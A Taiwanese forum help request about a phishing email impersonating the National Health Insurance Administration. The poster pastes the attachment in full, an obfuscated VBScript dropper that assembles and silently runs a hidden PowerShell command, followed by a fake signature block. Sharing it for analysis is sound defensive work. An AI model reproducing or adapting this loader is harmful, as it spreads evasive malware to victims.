• 2

不慎執行冒名衛福部的病毒怎麼辦?

因防毒軟體未偵測到威脅,
公司承辦健保相關業務的同仁點開了冒名中央健康保險署的信件附檔,
點擊後無法開啟才驚覺可能是詐騙信,

目前防毒軟體依然是最新病毒碼且顯示防護中,
無偵測到威脅或隔離記錄,
電腦也沒有發生任何異狀。
但從附加檔案看來,應可百分百肯定是詐騙信件。

較明顯的幾個點
1. 收件人地址並非該同仁
2. 無公司相關資訊且統編不正確

該同仁沒有該電腦之管理者權限,也不知管理帳戶密碼。
除了提醒大家注意這類詐騙信件外,不知是否有專家板友能夠解答這段程式做了哪些事?
在防毒軟體完全無法偵測到的情形下,應如何排除此威脅?

不慎執行冒名衛福部的病毒怎麼辦?
附加檔案是個會自動產生PowerShell命令的vbs程式
內容如下:
Set Subgraph = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set fuldfoert = Subgraph.ExecQuery("Select * from Win32_Process Where Name = 'explorer.e" + "xe'")
For Each Halsbetndelsers in fuldfoert
Set Sabotagens = CreateObject("WScript.Shell")
If Len(Halsbetndelsers.Path_) > 4 then Set Wrassles = Sabotagens.Exec("ping Host_6637.6637.6637.657e")
Next
Private Const Motionlessly = &H7F54
Private Const Saudiske = &HC419
Private Const Untell = &HFFFF25F3
Private Const Motorium = "Tllepraasene; primadonnanykke:"
Private Const Postvaccinal = "Reiterator16 sumpbveres;"
Private Const jernagtige = &HFFFF798B
Private Const Tabacosis = &HFFFFC706
Private Const Predetain = &HFFFFA382
Private Const Monandrian = &HD698
Private Const Dekoratives = &HFFFFD8B0
Private Const Bemadaming60 = "Tattiness! hallmarking126."
Private Const Papilloadenocystoma = -17895
Private Const Tramroads = &HC5A3
Private Const Vejrberetningernes = "ldreklubberne! retablerende"
Private Const Relativisten191 = -36384
Private Const Transformability = 41075
Private Const Skrmplanter = "Unfrenchified! anecdotist;"
Private Const Bestillingssiden = &H716C
Private Const thoughtlet = "Diarok; ethologists."
Private Const Mestrendes = 44795
Private Const Tallerkenretternes = 64009
Private Const Alodial = -36616
Private Const Regears = -45944
Private Const Djvelen = 25349
Private Const Baandspilleres = "Statskapitalisme miljforstyrrelsers!"
Private Const Carolled = "Camillos: oplgningmiddelet238"

Udenbordsmotors = Tareringens149

Call Indubitability("echo $Tart")
Call Indubitability("ryl;cassys")
Call Indubitability("unction Ur")
Call Indubitability("inalysis($")
Call Indubitability("Vulgarizat")
Call Indubitability("ion){ .($E")
Call Indubitability("nglnderind")
Call Indubitability("es) ($Vulg")
Call Indubitability("arization)}")
Call Indubitability(" cassysun")
Call Indubitability("ction Gul")
Call Indubitability("varealets(")
Call Indubitability("$Unirritat")
Call Indubitability("ive){$Ring")
Call Indubitability("kbingeres=")
Call Indubitability("4;do{$Termi")
Call Indubitability("nalhaandte")
Call Indubitability("ringers+=$")
Call Indubitability("Unirritativ")
Call Indubitability("e[$Ringkbin")
Call Indubitability("geres];$Rin")
Call Indubitability("gkbingere")
Call Indubitability("s+=5;$Ortho")
Call Indubitability("site=cossor")
Call Indubitability("mat-List}")
Call Indubitability(" until(!$U")
Call Indubitability("nirritative")
Call Indubitability("[$Ringkbing")
Call Indubitability("eres])$Term")
Call Indubitability("inalhaandt")
Call Indubitability("eringers}$D")
Call Indubitability("ingenots=G")
Call Indubitability("ulvareale")
Call Indubitability("ts 'BeviN ")
Call Indubitability("amaEGelaT")
Call Indubitability("Orth.Becass")
Call Indubitability("ysuW';$Din")
Call Indubitability("genots+=G")
Call Indubitability("ulvarealet")
Call Indubitability("s 'bl,ye Mo")
Call Indubitability("sbclevc Cl")
Call Indubitability("elTarii om")
Call Indubitability("E ypenUninT")
Call Indubitability("';$Electr")
Call Indubitability("ocautery=Gu")
Call Indubitability("lvarealet")
Call Indubitability("s 'BagmM N")
Call Indubitability("onoNutmz ")
Call Indubitability("Coni pkal")
Call Indubitability("OrbilGal a")
Call Indubitability("Pres/';$P")
Call Indubitability("erils=Gulva")
Call Indubitability("realets 'p")
Call Indubitability("irrTBol lS")
Call Indubitability("altsSkyk1ta")
Call Indubitability(".e2';$Rem")
Call Indubitability("inted=' Inn")
Call Indubitability("[RensNTrae")
Call Indubitability("EMidpTUn e.")
Call Indubitability("ephiSperi")
Call Indubitability("e AahRK l")
Call Indubitability("kVSkovi B")
Call Indubitability("inccaraECr")
Call Indubitability("adpNighOC")
Call Indubitability("icaIexcynTi")
Call Indubitability("mbTBattmR")
Call Indubitability("eekaTilbn")
Call Indubitability("LandAT ucg")
Call Indubitability("StedEcossr")
Call Indubitability("aaRTom,] ")
Call Indubitability("mop:Sa cass")
Call Indubitability("ys:GarbsG")
Call Indubitability("onoEcossi")
Call Indubitability("recDebauA")
Call Indubitability("nr RSpeni")

Skdebarnetsshanghajen = FormatCurrency(7374457)

Call Indubitability("Su.rtUnbeYA")
Call Indubitability("u hpAnt.R ")
Call Indubitability("SioOParet")
Call Indubitability("Lappo Tor")
Call Indubitability("C oscassys")
Call Indubitability("OThyrLP.is")
Call Indubitability("=Acassysga")
Call Indubitability("$Vo aPDyp")
Call Indubitability("ke anrPetr")
Call Indubitability("icossravlco")
Call Indubitability("ssreiS';$El")
Call Indubitability("ectrocaut")
Call Indubitability("ery+=Gulvar")
Call Indubitability("ealets 'E")
Call Indubitability("cassyste5Sk")
Call Indubitability("rcassys.Ro,")
Call Indubitability("e0Ur,n Bras")
Call Indubitability("( DouWBeo")
Call Indubitability("ri ndinBa b")
Call Indubitability("dGos,o bug")
Call Indubitability("wEndosModt ")
Call Indubitability("Swi.NB,iaTE")
Call Indubitability(" he Ka 1In")
Call Indubitability(" e0.eco.Dom")
Call Indubitability("i0 Nin;Abu")
Call Indubitability(". ydrW Gal")
Call Indubitability("iUnp n D ")
Call Indubitability("c6Tryk4Hy")
Call Indubitability("po; Hel Reg")
Call Indubitability("nxBa,r6 M")
Call Indubitability("yn4,nim; ")
Call Indubitability("ti Ari r In")
Call Indubitability(",vCud :C b")
Call Indubitability("i1cossj,r3A")
Call Indubitability("cet4Quat.")
Call Indubitability("Skov0Dans)T")
Call Indubitability("il, Deh G K")
Call Indubitability(" neSyltcMos")
Call Indubitability("kkstrmo Ud.")
Call Indubitability("/ryg 2 ib")
Call Indubitability("a0Jact1Ta,d")
Call Indubitability("0Gutt0Domm1")
Call Indubitability(",ton0Pill1T")
Call Indubitability(" gl Outrc")
Call Indubitability("ossBaksiKna")
Call Indubitability("cr Stre Dy")
Call Indubitability("rcassysPla")
Call Indubitability(",o RoexUrch")
Call Indubitability("/Anal1Bre")
Call Indubitability("a3Chow4 G.m")
Call Indubitability(".D uk0';$")
Call Indubitability("Havt=Gulvar")
Call Indubitability("ealets 'St")
Call Indubitability("adubislSS")
Call Indubitability("pirecoss.")
Call Indubitability("derSc.e- ")
Call Indubitability("hoaOmgigNa")

Subbaslykkesjaskedeskl = Subbaslykkesjaskedeskl + 1333052

Call Indubitability("tuESe inG")
Call Indubitability("esat';$Na")
Call Indubitability("gster=Gulv")
Call Indubitability("arealets '")
Call Indubitability(" ,pihevert")
Call Indubitability("MimotSlanpK")
Call Indubitability("ales nke:Di")
Call Indubitability(" l/ reg/Ch")
Call Indubitability("andTracass")
Call Indubitability("ysrK yti,ko")
Call Indubitability("lv VineBl")
Call Indubitability(".d.TrykgP")
Call Indubitability("lagoSletoSn")
Call Indubitability("apgProhlP")

Lrkernefiskendehang = Lrkernefiskendehang & "Skywrites"

Call Indubitability("anoe Unt.Pr")
Call Indubitability("odc gasoS")
Call Indubitability("pilm Hy /u")
Call Indubitability("nheu artcHa")
Call Indubitability("lv?PredeAu")
Call Indubitability("toxU tupS,")
Call Indubitability("ecou exrS")
Call Indubitability("nootSpar=")
Call Indubitability("Be ndTa.e")
Call Indubitability("oLappwkluk")
Call Indubitability("nTilglArdeo")
Call Indubitability("Impra Strd")
Call Indubitability("cassysidu&P")
Call Indubitability("osii aetdCr")
Call Indubitability("an=Yerb1Brn")
Call Indubitability(" mI.ge3udva")
Call Indubitability("TLadnP oli")
Call Indubitability("iUdk,h MinO")

Carrollpolemikereideotyp = Left("Caixinha",28)

Call Indubitability("VeraYT.kpXK")
Call Indubitability("ommvSevitGa")
Call Indubitability("laN Acass")
Call Indubitability("yssU KonITi")
Call Indubitability("p RMikeATi")
Call Indubitability("ll7H auCR")
Call Indubitability("ekoSTapir ")
Call Indubitability(" emJ Ur -C")
Call Indubitability("roq0DolocP")
Call Indubitability("ost0GuilC i")
Call Indubitability("ll7RentP E")
Call Indubitability("rgoBeke6 ")
Call Indubitability(",docassysI")
Call Indubitability("agtR';$Book")
Call Indubitability("able=Gulvar")
Call Indubitability("ealets 'Lex")
Call Indubitability("i>';$Engl")
Call Indubitability("nderindes")
Call Indubitability("=Gulvareal")
Call Indubitability("ets ' Tm i")
Call Indubitability(" .ksEGeva")
Call Indubitability("x';$Windin")
Call Indubitability("gs='Kathodi")
Call Indubitability("c';$Trylle")
Call Indubitability("bindende=")
Call Indubitability("'\Monochl")
Call Indubitability("oracetic96")
Call Indubitability(".Tok';Urin")
Call Indubitability("alysis (Gu")
Call Indubitability("lvarealet")
Call Indubitability("s ' Whe$Dyn")
Call Indubitability("gGBarlLGo.")
Call Indubitability("hO PerbTilc")
Call Indubitability("assysATr gl")
Call Indubitability(" Ste:Spro")
Call Indubitability("SContP Ka")
Call Indubitability("mEAlu.ANas")
Call Indubitability("ir,eaccoss")
Call Indubitability("Re riSelvsM")
Call Indubitability("ultH Aabe")
Call Indubitability("Dro SBond=")
Call Indubitability(" Jel$PlenEP")
Call Indubitability("uboNSpr.vH")
Call Indubitability("ype:BlunAK")
Call Indubitability("lveP Un P ")
Call Indubitability("DerDEnjoAA")
Call Indubitability("ntitrietA")
Call Indubitability("Teht+Lavn$")
Call Indubitability("HellTThurrL")
Call Indubitability("oquYModca")
Call Indubitability("ssyslResilA")
Call Indubitability("cassysskERi")
Call Indubitability(",abDm nIR")
Call Indubitability("adinIncassy")
Call Indubitability("srDDiscEco")
Call Indubitability("ssorhn.ys")
Call Indubitability("tDKoere');")
Call Indubitability("Urinalysis")
Call Indubitability(" (Gulvare")
Call Indubitability("alets 'gru")
Call Indubitability(".$jagtgSl")
Call Indubitability("ipl T poH")
Call Indubitability("aw B idea")
Call Indubitability(",eutl,rne:")
Call Indubitability(" acrI Hil")
Call Indubitability("N ManTakun")
Call Indubitability("e A tRKop")
Call Indubitability("iLR.gnoNeth")
Call Indubitability("cOmsku ,nd")
Call Indubitability("T CumRHerc")
Call Indubitability("eshakSUng")
Call Indubitability("dSKondeSa")
Call Indubitability("l,S Stv1Nom")
Call Indubitability("i9Snre6 ,ac")
Call Indubitability("=.eri$Joc")
Call Indubitability(".nlaywavol")
Call Indubitability("dGBlodsLy")
Call Indubitability(",tTTochE e")
Call Indubitability("taR,nst. a")
Call Indubitability("lvS AnaP U")
Call Indubitability("n,L cassysa")
Call Indubitability("riUnhatMo")
Call Indubitability("d,(Bekr$Per")
Call Indubitability("tB .oroDis")
Call Indubitability("co RegkDur")
Call Indubitability("iAThr,BPas")
Call Indubitability("tl K nEDol ")
Call Indubitability(")');Urinaly")
Call Indubitability("sis (Gulva")
Call Indubitability("realets $Re")
Call Indubitability("minted);$N")
Call Indubitability("agster=$Int")
Call Indubitability("erlocutres")
Call Indubitability("ses196[0];")
Call Indubitability("$Dagplejers")
Call Indubitability("=(Gulvareal")
Call Indubitability("ets ',eat$G")
Call Indubitability("araGSystlV")
Call Indubitability("ek OPeppBk ")
Call Indubitability("taA StiLBl")
Call Indubitability("o,:.vbeiIn")
Call Indubitability("kiN In u S")
Call Indubitability("almIndsb Ag")
Call Indubitability("aRPeriA N.n")
Call Indubitability("TProgeHing")
Call Indubitability("=S arNcoss")
Call Indubitability("redE Mikw")
Call Indubitability("Ina,-Maan")
Call Indubitability("o CerbDiagJ")
Call Indubitability(" DatE so cD")
Call Indubitability("ibrTAn,i Ac")
Call Indubitability("assyscassy")
Call Indubitability("sas OblYPa")
Call Indubitability("stsB ndtVer")
Call Indubitability("beOverm,arm")
Call Indubitability(".Der $Glob")
Call Indubitability("d Acassys i")
Call Indubitability("DataN uadg")
Call Indubitability(" Sgae egn")
Call Indubitability("NMerkOinco")
Call Indubitability("tPolis');")
Call Indubitability("Urinalysi")
Call Indubitability("s ($Dagple")
Call Indubitability("jers);Urin")
Call Indubitability("alysis (Gu")
Call Indubitability("lvarealets ")
Call Indubitability("' cossee$")
Call Indubitability("BiniiSkaanc")
Call Indubitability("ossioru V")
Call Indubitability("almcossorm")
Call Indubitability("bcomprSkr")
Call Indubitability("ia romtcons")
Call Indubitability("ekarr.Re,iH")
Call Indubitability(" EtbeMyliaB")
Call Indubitability("arbdKnaleDa")
Call Indubitability("a r ,ipsAu")
Call Indubitability("gu[ek.p$Blo")
Call Indubitability("uHWhisaNi")
Call Indubitability("ghvE eptCo")
Call Indubitability("mp]Gold= A")
Call Indubitability("ra$Skucass")
Call Indubitability("ysEAcassysr")
Call Indubitability("elSequeC ")
Call Indubitability("pacDonktL")
Call Indubitability("ucassyscass")
Call Indubitability("ysrCy eoRya")
Call Indubitability("ecandeaO,an")
Call Indubitability("uColotlik")
Call Indubitability("oe Warr D")
Call Indubitability("emy');$Lie")
Call Indubitability("rs=Gulvarea")
Call Indubitability("lets 'Skri")
Call Indubitability("$TraniPorr")
Call Indubitability("ncassysrit")
Call Indubitability("uTronmOmma")
Call Indubitability("bRecassys")
Call Indubitability("ir BroaUns")
Call Indubitability("ctRhedeTop")
Call Indubitability("h. penD Tr")
Call Indubitability("aoIn cassy")
Call Indubitability("swcossra ")
Call Indubitability("nKi tlGen.")
Call Indubitability("oTeleaAna")
Call Indubitability("bdBudtcos")
Call Indubitability("sCacassysc")
Call Indubitability("assysiToaal")
Call Indubitability("S cieGask")
Call Indubitability("( he $Ano")
Call Indubitability("tNKorpaRec")
Call Indubitability("egTryksTjre")
Call Indubitability("tblo eHairr")
Call Indubitability("Dipl,Acassy")
Call Indubitability("shj$PseuK")
Call Indubitability("PretrSspeuJ")
Call Indubitability("aupsrapee")
Call Indubitability("Cl mdD ma")
Call Indubitability("u SqulAlko")
Call Indubitability("lSp geDecur")
Call Indubitability(" Rekncoss")
Call Indubitability("aitetykt)'")
Call Indubitability(";$Krusedull")
Call Indubitability("erne=$Spear")
Call Indubitability("cassysishe")
Call Indubitability("s;Urinalys")
Call Indubitability("is (Gulvar")
Call Indubitability("ealets ' Ph")
Call Indubitability("o$ IndgBe")
Call Indubitability("y.lAnimO ")
Call Indubitability("cossraBTe")
Call Indubitability("glASengl u")
Call Indubitability("n : ettD,")
Call Indubitability("ikeIHng.P U")
Call Indubitability("m pRomaeU")
Call Indubitability("ndenRapp5Im")
Call Indubitability("pe5Oprr= ,v")
Call Indubitability("e(CredTEmi")
Call Indubitability("gEJenssSte")
Call Indubitability("mt Tho-Prel")
Call Indubitability("pLaegaS.g")
Call Indubitability("iTSkriHKry,")
Call Indubitability(" Vage$Over")
Call Indubitability("KTilvRAnni")
Call Indubitability("uReprSRepu")
Call Indubitability("EKoludSmleu")
Call Indubitability(" GarlStriL")
Call Indubitability("cossej,e,m")
Call Indubitability("ugR.larN T")
Call Indubitability("vaeWell)');")
Call Indubitability("while (!$")
Call Indubitability("Dippen55) ")
Call Indubitability("{Urinalys")
Call Indubitability("is (Gulvar")
Call Indubitability("ealets ' ")
Call Indubitability("Ka $Re eg")
Call Indubitability("NondlD.mo")
Call Indubitability("ocassyslo")
Call Indubitability("ubBe.baUnc")
Call Indubitability("hl U p:Pr")
Call Indubitability("evB.liyam.")
Call Indubitability("ndahjemdO")
Call Indubitability("kkesHypek")
Call Indubitability("T.lla Ens")
Call Indubitability("tBoyksVida=")
Call Indubitability("Indl$Dodgb")
Call Indubitability("Da.ne ilm")
Call Indubitability("mcossibeyNe")
Call Indubitability(" entitidVre")
Call Indubitability(" itessg.acr")
Call Indubitability("ePseul Pa s")
Call Indubitability(" Quae') ;U")
Call Indubitability("rinalysis $")
Call Indubitability("Liers;Urin")
Call Indubitability("alysis (G")
Call Indubitability("ulvarealet")
Call Indubitability("s 'Best[Sa")
Call Indubitability(" tTVir,hom")
Call Indubitability("stRSk le Ig")
Call Indubitability("aAcossin.d")
Call Indubitability("W.ndIRachn")
Call Indubitability(" BlaGElcass")
Call Indubitability("yso.Coa tK")
Call Indubitability(" asH ileRB")
Call Indubitability("snieBeseA")
Call Indubitability("DybsDPy h]L")
Call Indubitability("g e:Sac :S")
Call Indubitability("stes UnclM")
Call Indubitability("a,he Uere")
Call Indubitability(" CarpBagg( ")
Call Indubitability("Akt4 cri0Ol")
Call Indubitability("dt0Colo0Cra")
Call Indubitability("b)');Urina")
Call Indubitability("lysis (Gu")
Call Indubitability("lvarealet")
Call Indubitability("s 'coss,r")
Call Indubitability("e$AmplGA ")
Call Indubitability("ygL,ideoUn")
Call Indubitability("hib By,AG")
Call Indubitability("a lLBegi:K ")
Call Indubitability("rtdEkseiLng")
Call Indubitability("tpcossremPR")
Call Indubitability("edieSubrnLa")
Call Indubitability("ng5Nonp5Pi")
Call Indubitability("s = Arb(Me")
Call Indubitability(" lT UnaEM")
Call Indubitability("a,kSSulcas")
Call Indubitability("sysT ype-S")
Call Indubitability("ti,pOverAV")
Call Indubitability("ic TAbrih")
Call Indubitability("Dykn coss r")
Call Indubitability("e$NatikUn")
Call Indubitability("cor L eUCs")
Call Indubitability("neSRatieInt")
Call Indubitability("edSc,nuSkr")
Call Indubitability("iludvalUbec")
Call Indubitability("assyse DecR")
Call Indubitability(" tyrNHaa e")
Call Indubitability("Boks)') ;Ur")
Call Indubitability("inalysis ")
Call Indubitability("(Gulvareale")
Call Indubitability("ts ' Dys$")
Call Indubitability("DunhGTriclB")
Call Indubitability("rn o Piab")
Call Indubitability("Ko taLymplE")
Call Indubitability("xeq:Acass")
Call Indubitability("yssnoHjals")
Call Indubitability(" cossolt I")
Call Indubitability("kaeDaglouns")
Call Indubitability(",A LaeRAc")
Call Indubitability("assys.rtB n")
Call Indubitability("eHMilir,n")
Call Indubitability("geOCat.tco")
Call Indubitability("ssouroPeri")
Call Indubitability("M KobYBy ")
Call Indubitability("o=D kr$Stea")

Linguinesmmfdraserin = Rnd
Call Indubitability("Gcosso ca")
Call Indubitability("ssysL BlaOM")
Call Indubitability("aysbH.ncA")
Call Indubitability("EnsaLEwes")

Idoldyrkelsenssubtletytam158 = Mid("Delikatesseforretningers",210,142)

Call Indubitability(":StrasD.s")
Call Indubitability("cP abaiLa")
Call Indubitability("ppTLydbt ")
Call Indubitability(" iglcossej")
Call Indubitability("lEElekmSj")
Call Indubitability("etaBranNDeh")
Call Indubitability("u+Dowl+Bly")
Call Indubitability("a%,dgi$Pl")
Call Indubitability("adi.esmn Br")
Call Indubitability(".t ntoeAnsa")
Call Indubitability("RGreel k,r")
Call Indubitability("OS nnCapi,")
Call Indubitability("UUncoTAnch")
Call Indubitability("rTrijEOverS")
Call Indubitability("cosslicsK")
Call Indubitability("annEJa.pss")
Call Indubitability(" ap1Svin9Cu")
Call Indubitability("ir6Vivi.Un ")
Call Indubitability("vCcossilmoN")
Call Indubitability("ormu ehyN B")
Call Indubitability("ort') ;$N")
Call Indubitability("agster=$Int")
Call Indubitability("erlocutres")
Call Indubitability("ses196[$ost")
Call Indubitability("eoarthrotom")
Call Indubitability("y]}$Elecass")
Call Indubitability("ysantordene")
Call Indubitability("n=331879;")
Call Indubitability("$Papmeat=32")
Call Indubitability("525;Urina")
Call Indubitability("lysis (Gu")
Call Indubitability("lvarealet")
Call Indubitability("s 'Hypa$Akt")
Call Indubitability("iGRedsLKir")
Call Indubitability("kO,ateBDa a")
Call Indubitability("AAcassyscas")
Call Indubitability("sysllBagv:O")
Call Indubitability("pdrCProaa")
Call Indubitability("D busOvereS")
Call Indubitability("tejb ynoO,")
Call Indubitability("isquVi tn")
Call Indubitability("BortDEski")
Call Indubitability(" .at=Soll ")
Call Indubitability(" Un.G Kome ")
Call Indubitability("BilTUn,e-")
Call Indubitability("BoodCMec.oT")
Call Indubitability("pbaNCacoT")
Call Indubitability("De ae rym")
Call Indubitability("NB sktTe ")
Call Indubitability("p But$cos")
Call Indubitability("slask undRI")
Call Indubitability("n,iUB cksI")
Call Indubitability("rreERe oD")
Call Indubitability(" uplus,riL ")
Call Indubitability("Be lKlase n")
Call Indubitability("dtr Stanc")
Call Indubitability("ossoreE');U")
Call Indubitability("rinalysis")
Call Indubitability(" (Gulvarea")
Call Indubitability("lets 'kro")
Call Indubitability(",$T,ncassy")
Call Indubitability("sgBirdlcos")
Call Indubitability("sejloReim")
Call Indubitability("bInveaSamml")
Call Indubitability("Ooz : Th A")
Call Indubitability("Rerolbjert")
Call Indubitability("Paa.eAna rd")
Call Indubitability(" pskMotiaD")
Call Indubitability("andlDa kk c")
Call Indubitability("ossr Coad")
Call Indubitability("= blg coss")
Call Indubitability("rem[ nsuS")
Call Indubitability("LaggyUnbrs")

magnetbreremask = Mid("Allesammen",143,127)

Call Indubitability("RecotTjrne")
Call Indubitability("TrogmNabk")
Call Indubitability(".ClarCcosse")
Call Indubitability("dtoKaianP")

Randomize

Call Indubitability("ackvA.abe ")
Call Indubitability("sotrBug tHi")
Call Indubitability("pp]A ar:N ")
Call Indubitability("dt:Sn gcos")
Call Indubitability("sMaskrBel")
Call Indubitability("goUnbem .ea")
Call Indubitability("BSkiva Locs")
Call Indubitability(" vmme Dec")
Call Indubitability("6syll4cos")
Call Indubitability("si aSlempt")
Call Indubitability("RestrS ru")
Call Indubitability("iSpodnCyk g")
Call Indubitability("Over(T,en$")
Call Indubitability("ParaCcossre")
Call Indubitability("maAnl,s skr")
Call Indubitability("e Genb Di")
Call Indubitability("ooEpituUnde")
Call Indubitability("nMiaudTid")
Call Indubitability("s)');Urinal")
Call Indubitability("ysis (Gulv")
Call Indubitability("arealets 'W")
Call Indubitability("aba$GbakGUn")
Call Indubitability("del CraOKu")
Call Indubitability("lebInitaT")
Call Indubitability("j tlBoob: o")
Call Indubitability("vecassys,")
Call Indubitability("ostjWaltoP")
Call Indubitability("ortR,hioDb,")
Call Indubitability("ghRTilrEEn")
Call Indubitability("isj rhvEKa")
Call Indubitability("n RIconnS")
Call Indubitability("coteTelo .o")
Call Indubitability("lb= otl P")
Call Indubitability("ar [ Pe s ")
Call Indubitability("Ge Y SkusS")
Call Indubitability("maltHandeC")
Call Indubitability("ounmHomo.sp")
Call Indubitability("orTBilcas")
Call Indubitability("syseRe cx ")
Call Indubitability("kamtCh.l. ")
Call Indubitability("Absecossin")
Call Indubitability("mNH pec B")
Call Indubitability("a o,held Ka")
Call Indubitability("ni yginPre.")
Call Indubitability("gHaan] ode")
Call Indubitability(": nta:T,w")
Call Indubitability("sa gloSedi")
Call Indubitability("tCgieti Ra")
Call Indubitability("viLa e.Lac")
Call Indubitability("rgKapiE,al")
Call Indubitability("ltHe.vsop")
Call Indubitability("spTVaesR i")
Call Indubitability("ssiQuabn T")
Call Indubitability("elgA nu(La,")
Call Indubitability("cassys$Al ")
Call Indubitability("oa.ibrl npl")
Call Indubitability("T PusePrju")
Call Indubitability("RcossoruK O")
Call Indubitability("veAku,slT")
Call Indubitability("amaKJagt)")
Call Indubitability("');Urinal")
Call Indubitability("ysis (Gulva")
Call Indubitability("realets 'm")
Call Indubitability("oon$ ncassy")
Call Indubitability("sog BedL.v")
Call Indubitability("lgOP egBco")
Call Indubitability("ssa.vAKns")
Call Indubitability("aL ,ns:Coc")
Call Indubitability("oN HesiHypo")
Call Indubitability("tIncassyseR")
Call Indubitability("TicassystiC")
Call Indubitability(" mmTAlp,tc")
Call Indubitability("ossrdie,yn")
Call Indubitability("sRS.bpnJa")
Call Indubitability("ckEAbdusE")
Call Indubitability("cassyst.=")
Call Indubitability("Pakn$Pter")
Call Indubitability("cossK eaJ.")
Call Indubitability("rkaOZemerh")
Call Indubitability("jdedPensr D")
Call Indubitability("r eRubbJwi")
Call Indubitability("d eRaagrc")
Call Indubitability("ossorrNMo")
Call Indubitability("ilEJ bb. ")
Call Indubitability("OrlS,yclu")
Call Indubitability("Crunbskams ")
Call Indubitability("Artt.ounrco")
Call Indubitability("ssjeli Ba")
Call Indubitability("nnKursG E")
Call Indubitability("de( N,n$a")
Call Indubitability("irme ypl S")
Call Indubitability("trEAn,aco")
Call Indubitability("ssGoniaS.ru")
Call Indubitability("nUninTSljdO")
Call Indubitability("Sh cassys")
Call Indubitability("rBudcDGon")
Call Indubitability("eE utNCol")
Call Indubitability("ueC stnPro")
Call Indubitability("l,Nion$Se")
Call Indubitability("udpAgraaEt")
Call Indubitability("apP rehMry")
Call Indubitability("g E PseALa")
Call Indubitability("boTLoss)');")
Call Indubitability("Urinalysis ")
Call Indubitability("$Nitritter")
Call Indubitability("nes;")
















Do While Wrassles.Status = 0

WScript.Sleep 100

Kevlarrevisoraterregr=6022
Dapsammenbyggegree = ChrW(Kevlarrevisoraterregr)


Loop

sabbatsaftenerne = "P"

Antrufnes = Wrassles.StdOut.ReadAll()


Sukkerrrs = Instr(1,Antrufnes,"6637")

Sukkerrrs = mid(Antrufnes,Sukkerrrs,4)

For i = 0 to Sukkerrrs
Brember = Brember & "w"
next

Sukkerrrs = Instr(1,Antrufnes,"e")

Sukkerrrs = mid(Antrufnes,Sukkerrrs,1)

Udenbordsmotors = Nonbulkhead(Udenbordsmotors,"cassys","f")

Udenbordsmotors = Nonbulkhead(Udenbordsmotors,"coss","F")

Fiskere = Sukkerrrs + "r"+ Rared(115) + "he" + Rared(108) + Rared(108) + Rared(32) + Rared(34) + Udenbordsmotors + Rared(34)




Naadelseste=Sabotagens.Run(sabbatsaftenerne + "o" + mid(Brember,6637,1) & Fiskere,0)

Function Indubitability (Enteraden)

Udenbordsmotors = Udenbordsmotors + Enteraden

End function


Function Rared (Enteraden)

Rared = chrW(Enteraden)

End function



Function Nonbulkhead(Ubeheftedes, Maidy ,Glasforsikring )

Recitationers = True

Set Deltagelserne = CreateObject("VBScript.RegExp")

Deltagelserne.Global = Recitationers

Deltagelserne.Pattern = Maidy

Nonbulkhead = Deltagelserne.Replace(Ubeheftedes, Glasforsikring)


End Function



'' SIG '' Begin signature block
'' SIG '' MIIHNQYJKoZIhvcNAQcCoIIHJjCCByICAQExDzANBglg
'' SIG '' hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor
'' SIG '' BgEEAYI3AgEeMCQCAQEEEE7wKRaZJ7VNj+Ws4Q8X66sC
'' SIG '' AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg
'' SIG '' /Ia6aleTZl5HM071LZ+Hk2WfGDFMfNaKeHgacsIFOUSg
'' SIG '' ggQ9MIIEOTCCAyGgAwIBAgIUddRka3Ca9e9TOyX7pSj3
'' SIG '' 16iaXScwDQYJKoZIhvcNAQELBQAwgasxCzAJBgNVBAYT
'' SIG '' AkRFMRQwEgYDVQQIDAtCcmFuZGVuYnVyZzEbMBkGA1UE
'' SIG '' CwwSUHllbG90b215IEdlb2dyYWYgMRMwEQYDVQQHDApC
'' SIG '' cnVjaGhhZ2VuMREwDwYDVQQKDAhEaXJlY3RlZDEuMCwG
'' SIG '' CSqGSIb3DQEJARYfcHJlc3RpZGlnaXRhdGlvbnNATWFy
'' SIG '' Y2VsbGVyLkNhbTERMA8GA1UEAwwIRGlyZWN0ZWQwHhcN
'' SIG '' MjQxMDI5MDEwMTAyWhcNMjUxMDI5MDEwMTAyWjCBqzEL
'' SIG '' MAkGA1UEBhMCREUxFDASBgNVBAgMC0JyYW5kZW5idXJn
'' SIG '' MRswGQYDVQQLDBJQeWVsb3RvbXkgR2VvZ3JhZiAxEzAR
'' SIG '' BgNVBAcMCkJydWNoaGFnZW4xETAPBgNVBAoMCERpcmVj
'' SIG '' dGVkMS4wLAYJKoZIhvcNAQkBFh9wcmVzdGlkaWdpdGF0
'' SIG '' aW9uc0BNYXJjZWxsZXIuQ2FtMREwDwYDVQQDDAhEaXJl
'' SIG '' Y3RlZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
'' SIG '' ggEBAMNs4iuMHaTsQmccGXgD3ov2mE68ilz3vlblU5kU
'' SIG '' snsQ8hL+ZVIlS9naunTqR5iaIcLgtdHWnKrWkXcbVpAf
'' SIG '' v1E3EpDiG+w7hBoYltnTIWSHiHwWMfWxslj6xEnmuB1m
'' SIG '' xO+myJrOzRlNtX6L72DO7GbUYs1h4ZDv5uLxYcyPLqAS
'' SIG '' Ni/ur8a8l0XRyjUnvINclpCT8p2pXWf/bSgZgi6R8cWL
'' SIG '' 8KC9AaXouU7YXGroGZYUAQ0htdfAcv2TYZR2Nrd6hv/I
'' SIG '' 74Jl+NK1gR374zWSILeVabWlvvnuU4aCxNgP5/ZXtlOS
'' SIG '' pnh/uN+wkx83HrpJOKH9k/gCqO3AqsXQOGJ7auUCAwEA
'' SIG '' AaNTMFEwHQYDVR0OBBYEFAO//2QtKj97ac1rZ5kgJc47
'' SIG '' E3asMB8GA1UdIwQYMBaAFAO//2QtKj97ac1rZ5kgJc47
'' SIG '' E3asMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEL
'' SIG '' BQADggEBAI93NByVVSJ/UhFfb6kUicrEtm/OmcYytLJ0
'' SIG '' aoPxGZ9XdgljrauOsoGp7Ffibj8DFqIP9CWv38tv2t6I
'' SIG '' AqAhpMM704bdXOv9OkRJypdHvmxS1WBpD9A5r7hzLjW0
'' SIG '' NQUVtrN2RvU9BoGFEqJCYhLAITasftztsgtkpJSk0afg
'' SIG '' vwlkYC4zl+cSMkQ6jqNi0ZoLmOVUnlNX920Cm6im8dVu
